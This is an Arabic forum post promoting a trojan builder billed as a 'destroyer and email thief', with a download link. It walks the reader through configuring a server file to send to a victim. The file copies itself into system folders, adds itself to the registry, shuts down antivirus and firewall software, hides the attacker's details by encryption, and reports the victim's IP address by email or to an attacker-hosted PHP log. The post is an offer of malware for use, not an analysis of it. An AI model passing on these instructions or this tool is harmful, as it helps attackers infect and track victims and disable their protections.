برنامج " مدمر وسارق الايميل " الجديـــد لسرقة الايميل
وهذا الشرح :
وظيفة البرنامج: التبليغ عن ان الضحية دخل الانترنت وارسال الايبي لك.
حجم التروجان: 50 كيلو بايت وبعد الضغط بال UPX يصبح 24 كيلو بايت تقريبا.
الأنظمة التي يعمل السيرفر عليها: يعمل على جميع اصدارات ويندوز.
مواصفات البرنامج و السيرفر:ا
1- الابلاغ بطريقتين اما عن طريق البريد او عن طريق الـ PHP.
2- استخدام تقنية تشفير البيانات حيث لا تستطيع رؤية البيانات باستخدام برامج ال hex
بحيث لا تستطيع الضحية رؤية اي معلومات عن التروجان كعنوان بريدك المخزن او رابط موقعك.
3- لا تحتاج لأن تكتب سيرفر البريد في البرنامج فقط ضع بريدك وسوف يقوم السيرفر بالباقي
ويعمل مع اي بريد هوتميل او ياهو .....الخ.
4- يوجد خيار ضغط السيرفر بالـ UPX تلقائيا حتى لو كنت لا تعرف كيف تستخدم الـ UPX.
شرح البرنامج:
اولا عند فك ضغط البرنامج سوف ترى ثلاث ملفات وهي:
المبلغ الآلي: وهو البرنامج الرئيسي.
server.dll : وهو الملف المساعد لتكوين السيرفر.
upx.exe : وهو برنامج لضغط الملفات.
اول شئ تقوم بالضغط على زر قراءة الملف ثم اختر الملف server.dll وبعد ذلك غير البيانات كما يأتي:
اسم السيرفر: اكتب اي اسم تريد وهذا اسم السيرفر بعدما ينسخ نفسه في احد المجلدين الذي تختاره.
اسم الرجستري: اكتب اي اسم تريد وهو الاسم الذي يظهر في الرجستري .
اسم الضحية: اكتب اي اسم تريد لكي تستطيع ان تفرق بين ضحاياك.
موقع السيرفر: هنا تختار اين ينسخ السيفر نفسه اما في مجلد الويندوز او مجلد السيستم.
قتل برامج الحماية: هذا الخيار يغلق لك برامج الانتي فايروس وبرامج الفايروول (الحائط الناري).
الضغط بواسطة ال UPX: هذا الخيار ييقوم بضغط ملف السيرفر بواسطة ال UPX.
عنوان بريدك: اكتب بريدك كاملا مثلا : otmail.com
رابط الملف: اكتب هنا رابط ملف ال PHP الموجود على موقعك.
بعد ذلك اضغط على حفظ الملف وسوف ترى ملف جديد في مجل البرنامج اسمه server.exe وهو ملف السيرفر الذي ترسله للضحية.
ملاحظة:
بالنسبة للابلاغ عن طريق ال php فقط ضع ملف ال php المرفق مع البرنامج في موقعك واكتب رابط الموقع بشكل جيد في البرنامج
مثال:
www.yoursitecom/file.phpوبعدها اذا دخلت الضحية الانترنت سوف يتم تكوين ملف اسمه log.txt ويتم فيه تخزين بيانات الضحية فقط قم بفحص الملف log.txt
www.yoursite.com/log.txtاما بالنسبة للابلاغ عن طريق البريد فسوف تأتيك رسالة من Nobody وبها الايبي وانصح المستخدمين
اذا استخدموا الابلاغ عن طريق البريد الا يستخدموا بريد الهوتميل وانما يستخدموا اي بريد اخر
وهذه وصله البرنامج
المحتوى الان غير مخفيhttp://www.geocities.com/dr_ahmedhamdy/notify.zip